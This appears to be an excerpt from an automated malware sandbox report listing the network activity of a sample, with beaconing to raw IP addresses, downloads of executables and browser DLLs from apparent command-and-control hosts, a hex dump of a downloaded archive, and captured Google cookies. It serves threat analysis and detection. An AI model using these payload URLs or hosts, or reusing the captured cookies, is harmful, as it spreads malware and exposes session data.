                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_0042676C __EH_prolog,WSAStartup,socket,WSACleanup,gethostbyname,htons,connect,send,send,recv,recv,recv,recv,recv,WSACleanup,closesocket,0_2_0042676C
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 27 Apr 2024 00:03:42 GMTContent-Type: application/zipContent-Length: 3884863Last-Modified: Wed, 24 Apr 2024 05:45:46 GMTConnection: keep-aliveETag: "66289c8a-3b473f"Strict-Transport-Security: max-age=31536000Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 0b 3f 98 58 ef da 8c 80 dd c7 12 00 09 49 14 00 09 00 00 00 62 75 6e 63 68 2e 64 61 74 5c 5d 87 a2 aa 3a 16 cd af 89 8a 20 22 2a 16 10 05 54 ec 15 1b fa f7 b3 d6 4e 3c 77 66 bc ef 58 20 24 3b bb 65 b7 e4 29 a5 ac 9e af 7c 75 5d 2b bc a6 ca 55 2a 56 ea a9 7e af 81 db 9b bd d4 66 da 52 6a 65 f7 f5 b5 1d fe 1a b5 40 f5 66 f8 72 c0 df 56 0d 95 da 17 4a 2d f0 23 55 bd e7 b3 b7 bc 2a b5 de ab 3d ba 54 13 f5 45 13 35 cc 94 5a fa e3 83 aa 26 b5 9e 7a cf 95 fa f4 27 18 6b a2 8e 25 9e cb 4a 65 a9 cb 85 03 dc d4 5b 35 1e e8 cd c6 8f f7 50 c5 db 85 42 7f b5 19 40 05 ac f3 07 2e bf d4 e9 96 a8 47 eb fc 7a 5b 2a 8f 2d 42 31 e2 c3 ce d0 4a 7a 23 0c a9 ce d7 25 de bb 4a b1 fb a6 6a 06 0f d5 57 f5 a4 0e 18 af b5 00 1d 3e 36 32 eb 6a 4b 28 95 bc 0d d4 f1 a3 1a a1 9a c4 a5 02 84 45 b4 54 c9 51 7d d6 6a dd 5f 49 8b 8e 52 ee 54 45 6a a3 3e d2 f1 8b 4f c6 2a 99 3a 4a 25 6f a5 da aa 18 02 8b ec aa a6 b2 60 82 66 2b 4f a9 d6 1c 57 3e 15 87 c0 a3 dd 53 8e 49 4e 43 f5 6d ab 36 be a9 7c 77 51 bb 78 6b ba 4b fa eb fb e5 c8 6f bd 44 1d da 82 f4 13 3a ec 6e 34 01 be 0b f5 50 3e be 84 2a 4d 86 5f 7c 1b a9 8d 50 a7 52 40 9d 67 57 00 90 af 6b 98 90 58 dd c1 01 4d 62 4d d5 0b 9a 17 00 48 0d e6 07 f5 11 e0 eb 20 0c be a0 97 c5 23 6f 05 43 43 fb 21 da b5 c6 fd 31 21 52 f5 67 a2 f2 0a f8 51 63 20 22 50 0d 95 ab c2 51 87 33 a0 48 d0 42 f3 46 e7 7c 1d c6 aa 91 29 97 e0 bd ea cf c6 f8 a9 ae 13 dc f0 40 81 bf 57 f3 a8 36 9f a1 5a 03 15 37 90 39 e0 b5 ed a2 af b6 fc ea 91 64 27 60 5f bf 36 c0 7a 72 25 61 c7 c3 b6 85 1b 00 2a 1e 37 00 2c 2e 92 dd 6c 0c e4 a8 8e a3 2e 68 cb 76 9f f4 18 a0 8b e3 50 0d 4f 05 66 e1 8d 15 21 f4 fd 59 b7 f3 23 b3 b0 59 81 37 cd c2 67 d5 d8 b9 76 3d c4 f0 6b 7f a3 00 f0 4a d5 f9 d4 4e 23 5c a5 35 cc 93 d7 c1 d2 c2 a3 5d cc a7 ca f8 ad 1f b6 3c cf 56 47 55 00 7e 99 cb 9d a8 c7 2c bd d1 58 1e 6f 9b 6b 2e 80 23 8f ce 3f 76 a1 16 25 88 30 ac 2b f2 f9 8d 6d d8 28 6d c5 9e ea 61 68 be 4a 47 3e 16 00 83 fd d8 6d f7 d1 56 99 9a 0c dd f7 d3 6b 62 c0 f3 9a f3 42 ab 6a 58 a1 17 bc 56 24 70 92 a9 93 20 ce 95 c7 3f 9b 3c d8 aa f7 16 bd 5e cf 1d cc 25 4b 41 3d 30 5c be 28 ba c3 09 a6 f8 b8 51 ac 6c 3e 8c 3b 78 ad db 23 57 d5 96 40 40 1b 74 49 55 20 1d a6 f3 51 1b a0 8c 08 9a a5 16 97 14 c2 c0 d9 90 19 2f 65 c9 99 37 45 77 c4 95 f5 7d 68 dc e2 5e 4e e2 02 c5 20 89 9e 18 bb c2 8f 91 f9 de 2b 95 e6 fb 0e c8 b2 c7 0f 8d a9 62 52 7a ca ea f7 1a e3 8b 0a 81 9a 86 32 72 a5 66 1e de 84 75 27 6f bc f1 73 1c 7d 31 05 f4 b8 6a c5 7b 10 27 25 b5 c0 19 b5 85 1a b6 3f ce 81 8d 5a 03 fc 4d d5 00 d3 d4 ca ae 39 2e 7c 50 be dd 57 a3 6f a9 d6 f9 63 a0 92 d1 9b 33 c0 00 ed 15 48 5c 87 34 95 a2 42 8a c6 a3 c0 dc df df 3b 31 34 d1 a2 36 35 93 51 33 00 85 b9 f7 32 34 24 8b ec
                              Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                              Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgSaEMC5GMCJsbEGIjDQUM1XksqiVK7TvDJ-VWO8_5g4InGTtoS9EM--2kh8-SXh1FoYbI9aSPEi5GAatgQyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-27-00; NID=513=nlJq8NksY3fw5JjqePju25SB4Ei052Ou-_BYpqCCmn5cqs1f7XdItZC5M5e-NHwxW8MHKmNIQq2CnKFtMN_ebrB1BwDEg6kASn0UsYT9aGECdJ6CQ0wzQfDYJstMC0Kt6w1U5xw-pQAMPux27C__0M0wEogYWQpCfaKnIaXXWG4
                              Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgSaEMC5GMCJsbEGIjAHBiCBZ-8IAykP8bXpVLKe0gHlM-R2QwNJoGYdPTBn5xWSyLCRRyfLdQ2qWbDO2CMyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-27-00; NID=513=c4eeLLbbUjrdVmY_3J67bVqlRrcId_Uly38Ob6hofqA06jqIxHd5LWwDDb_r2n_PI-Nq7d4rl0LqmARVgn0EQZL3iurYGIl8JRK4ijq2lCBIDoh_Xo7ipkby0KBmt1nHFR-uf5Pr1tzPsHyswZ_A9PXlsQ1zkKv12A3Y2VM9JHs
                              Source: global trafficHTTP traffic detected: GET /sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 19 Mar 2024 23:10:10 GMTUser-Agent: Microsoft BITS/7.8Host: download.iolo.net
                              Source: global trafficHTTP traffic detected: GET /cpa/ping.php?substr=eight&s=ab&sub=0 HTTP/1.1Host: 185.172.128.90User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                              Source: global trafficHTTP traffic detected: GET /ping.php?substr=eight HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                              Source: global trafficHTTP traffic detected: GET /syncUpd.exe HTTP/1.1Host: 185.172.128.59User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                              Source: global trafficHTTP traffic detected: GET /1/Package.zip HTTP/1.1Host: note.padd.cn.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                              Source: global trafficHTTP traffic detected: GET /15f649199f40275b/sqlite3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /15f649199f40275b/freebl3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /15f649199f40275b/mozglue.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /15f649199f40275b/msvcp140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /15f649199f40275b/nss3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /BroomSetup.exe HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                              Source: global trafficHTTP traffic detected: GET /15f649199f40275b/softokn3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /15f649199f40275b/vcruntime140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /tiktok.exe HTTP/1.1Host: 185.172.128.203Cache-Control: no-cache
                              Source: global trafficDNS traffic detected: DNS query: note.padd.cn.com
                              Source: global trafficDNS traffic detected: DNS query: www.google.com
                              Source: global trafficDNS traffic detected: DNS query: svc.iolo.com
                              Source: global trafficDNS traffic detected: DNS query: download.iolo.net
                              Source: unknownHTTP traffic detected: POST /v2/track HTTP/1.1Content-Type: application/x-json-streamContent-Encoding: gzipHost: westus2-2.in.applicationinsights.azure.comContent-Length: 850Expect: 100-continueConnection: Keep-Alive
                              Source: u3bs.0.exe, 00000001.00000002.2975335845.00000000043E8000.00000004.00000020.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: http://185.172.128.203/tiktok.exe
                              Source: u3bs.0.exe, 00000001.00000002.2995019108.000000002A7E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.203/tiktok.exe&
                              Source: u3bs.0.exe, 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: http://185.172.128.203/tiktok.exe00
                              Source: u3bs.0.exe, 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: http://185.172.128.203/tiktok.exet-Disposition:
                              Source: u3bs.0.exe, 00000001.00000002.2975209039.0000000004314000.00000040.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76
                              Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004367000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/freebl3.dll
                              Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004367000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/freebl3.dllc
                              Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004367000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/mozglue.dll
                              Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004367000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/msvcp140.dll
                              Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004367000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/msvcp140.dllQ
                              Source: u3bs.0.exe, 00000001.00000002.2975335845.000000000432A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/nss3.dll
                              Source: u3bs.0.exe, 00000001.00000002.2975335845.000000000432A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/nss3.dllb
                              Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/nss3.dllr
                              Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004367000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/softokn3.dll
                              Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004367000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/sqlite3.dll
                              Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004367000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/sqlite3.dll#
                              Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004367000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/vcruntime140.dll)
                              Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004367000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/vcruntime140.dll:
                              Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000002.2975335845.000000000432A000.00000004.00000020.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.php
                              Source: u3bs.0.exe, 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpb530a5706ea79088c3d36b56fcb77release4d62687a42cd9519ca69bf
                              Source: u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpt
                              Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                              Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
                              Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                              Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007614000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007614000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
                              Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                              Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                              Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                              Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007614000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2231044420.0000000005EDD000.00000004.00000020.00020000.00000000.sdmp, run.exe.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                              Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
                              Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                              Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                              Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                              Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                              Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007614000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                              Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                              Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007614000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
                              Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
                              Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                              Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                              Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
                              Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
                              Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                              Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007614000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007614000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
                              Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
                              Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                              Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007614000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007228000.00000004.00000020.00020000.00000000.sdmp, u3bs.3.exe, 00000011.00000000.2777480035.000000000041C000.00000020.00000001.01000000.00000012.sdmpString found in binary or memory: http://download.iolo.net
